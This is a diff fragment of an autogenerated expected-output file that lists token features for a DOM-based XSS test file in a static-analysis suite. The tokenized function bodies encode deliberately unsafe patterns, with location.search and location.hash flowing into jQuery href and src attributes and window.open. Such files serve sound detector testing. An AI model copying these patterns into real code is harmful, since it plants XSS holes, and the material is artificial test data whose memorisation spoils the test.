URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:46 | exceptional return of documen ... bstr(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:46 | exceptional return of documen ... bstr(1) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:46 | exceptional return of documen ... bstr(1) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:46 | exceptional return of documen ... bstr(1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:471:22:471:29 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:471:22:471:29 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:471:22:471:29 | location | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:471:22:471:29 | location | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:471:22:471:29 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:471:31:471:36 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:471:31:471:36 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:471:31:471:36 | search | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:471:31:471:36 | search | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:471:31:471:36 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:471:38:471:43 | substr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:471:38:471:43 | substr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:471:38:471:43 | substr | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:471:38:471:43 | substr | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:471:38:471:43 | substr | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:471:45:471:45 | 1 | CalleeFlexibleAccessPath | document.location.search.substr | | autogenerated/Xss/DomBasedXss/tst.js:471:45:471:45 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:471:45:471:45 | 1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17785,6 +123534,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:471:45:471:45 | 1 | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:471:45:471:45 | 1 | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:471:45:471:45 | 1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:3 | $ | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:3 | $ | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:23 | $("" ... : url}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:23 | $("" ... : url}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:23 | $("" ... : url}) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:23 | $("" ... : url}) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:23 | $("" ... : url}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:23 | exceptional return of $("" ... : url}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:23 | exceptional return of $("" ... : url}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:23 | exceptional return of $("" ... : url}) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:23 | exceptional return of $("" ... : url}) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:23 | exceptional return of $("" ... : url}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:32 | $("" ... ppendTo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:32 | $("" ... ppendTo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:32 | $("" ... ppendTo | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:32 | $("" ... ppendTo | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:32 | $("" ... ppendTo | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:40 | $("" ... "body") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:40 | $("" ... "body") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:40 | $("" ... "body") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:40 | $("" ... "body") | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:40 | $("" ... "body") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:40 | exceptional return of $("" ... "body") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:40 | exceptional return of $("" ... "body") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:40 | exceptional return of $("" ... "body") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:40 | exceptional return of $("" ... "body") | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:473:3:473:40 | exceptional return of $("" ... "body") | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:473:5:473:9 | "" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:473:5:473:9 | "" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:473:5:473:9 | "" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17799,6 +123578,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:473:12:473:22 | {href: url} | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:473:12:473:22 | {href: url} | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:473:12:473:22 | {href: url} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:16 | href | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:16 | href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:16 | href | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:16 | href | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:16 | href | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:21 | href: url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:21 | href: url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:21 | href: url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:21 | href: url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:21 | href: url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:21 | href: url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:21 | href: url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:21 | href: url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:21 | href: url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:473:13:473:21 | href: url | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:473:19:473:21 | url | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:473:19:473:21 | url | InputAccessPathFromCallee | 1.href | | autogenerated/Xss/DomBasedXss/tst.js:473:19:473:21 | url | InputArgumentIndex | 1 | @@ -17808,6 +123602,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:473:19:473:21 | url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:473:19:473:21 | url | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:473:19:473:21 | url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:473:25:473:32 | appendTo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:473:25:473:32 | appendTo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:473:25:473:32 | appendTo | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:473:25:473:32 | appendTo | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:473:25:473:32 | appendTo | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:473:34:473:39 | "body" | CalleeFlexibleAccessPath | $().appendTo | | autogenerated/Xss/DomBasedXss/tst.js:473:34:473:39 | "body" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:473:34:473:39 | "body" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17815,6 +123614,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:473:34:473:39 | "body" | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:473:34:473:39 | "body" | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:473:34:473:39 | "body" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:3 | $ | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:3 | $ | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:11 | $("#foo") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:11 | $("#foo") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:11 | $("#foo") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| 